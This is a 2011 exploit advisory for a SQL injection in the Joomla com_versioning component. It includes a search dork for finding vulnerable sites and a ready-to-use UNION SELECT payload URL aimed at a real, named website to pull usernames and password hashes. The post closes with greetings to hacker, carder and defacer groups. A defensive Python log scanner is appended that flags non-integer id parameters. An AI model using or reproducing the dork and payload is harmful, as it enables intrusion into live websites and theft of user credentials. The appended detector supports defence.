Joomla versioning SQLi Vulnerability

2011.05.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

| Joomla Component com_versioning SQLi Vulnerability |

#[~] Author : the_cyber_nuxbie
#[~] Home   : www.thecybernuxbie.com
#[~] E-mail : staff@thecybernuxbie.com
#[~] Found  : 09 May 2011.
#[~] Tested : Windows 7 Ultimate 32bit (pirated).
#[!] Dork   : inurl:"com_versioning"
______________________________________________________________

[x] X.P.L:
../public_html/index.php?option=com_versioning&sectionid=0&+task=edit&id=[SQLi] <--- Your Skill...!!!

- Example Exploits:
http://www.bip.wbp.opole.pl/index.php?option=com_versioning&sectionid=0&+task=edit&id=18+AND+1=2+UNION+SELECT+1,2,group_concat%28username,0x3a,password%29+from+jos_users--

- Shout & Greetz:
All Member & Staff SekuritiOnline | www.sekuritionline.net
All Member & Staff YogyaFamilyCode | www.xcode.or.id
All Member & Staff Devilzc0de | www.devilzc0de.org
All Member & Staff Hacker-Newbie | www.hacker-newbie.org
All Member & Staff ECHO | www.echo.or.id
All Member & Staff WhiteCyber | www.whitecyber.net
All Member & Staff MuslemHacker | www.muslimhackers.net
All Member & Staff BinusHacker | www.binushacker.net
All Member & Staff Jasakom | www.jasakom.com
All Member & Staff YogyaCarderLink. | www.yogyacarderlink.web.id
All Member & Staff IndonesianDefacer | www.indonesiandefacer.org
All Member & Staff IndonesianCoder | www.indonesiancoder.com
All Member & Staff MagelangCyber | www.magelangcyber.web.id
All Member & Staff Jatim-Crew | www.jatimcrew.org
All Member & Staff Fast-Hacker | www.fasthacker.org
And all cyber forums / communities across Indonesia. :-D ,etc...

Sorry bro... I'm still a newbie... :-D
Please don't insult me... :-(
Bwahahahaha... :-D

- May 09 2011, GMT +09:35 Solo Raya, Indonesia.
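A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access-log lines for com_versioning requests whose id parameter is not a plain integer. The log lines, the function name and the assumption that a legitimate id is always numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2011:09:35:00 +0000] "GET /index.php?option=com_versioning'
    '&sectionid=0&task=edit&id=18 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/May/2011:09:36:10 +0000] "GET /index.php?option=com_versioning'
    '&sectionid=0&+task=edit&id=18+AND+1=2+UNION+SELECT+1,2,3-- HTTP/1.1" 200 4312',
    '203.0.113.9 - - [10/May/2011:09:36:40 +0000] "GET /index.php?option=com_content'
    '&view=article&id=7 HTTP/1.1" 200 9000',
    '198.51.100.2 - - [10/May/2011:09:37:02 +0000] "GET /index.php?option=com_versioning'
    '&task=edit&id=18%20union%20select%201 HTTP/1.1" 200 4000',
]

# Request line inside the quoted field: METHOD <target> HTTP/x.y
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id value is ASCII digits only.
INT_RE = re.compile(r"[0-9]+")


def suspicious_versioning_requests(lines):
    """Return (client_ip, decoded_id) for com_versioning requests with a non-integer id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs URL-decodes values, so '+' and %20 both become spaces.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_versioning" not in query.get("option", []):
            continue
        for value in query.get("id", []):
            if not INT_RE.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_versioning_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer id: {value!r}")
```

The same integer-only rule can be enforced in front of the application as a request filter on the id parameter for this component.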

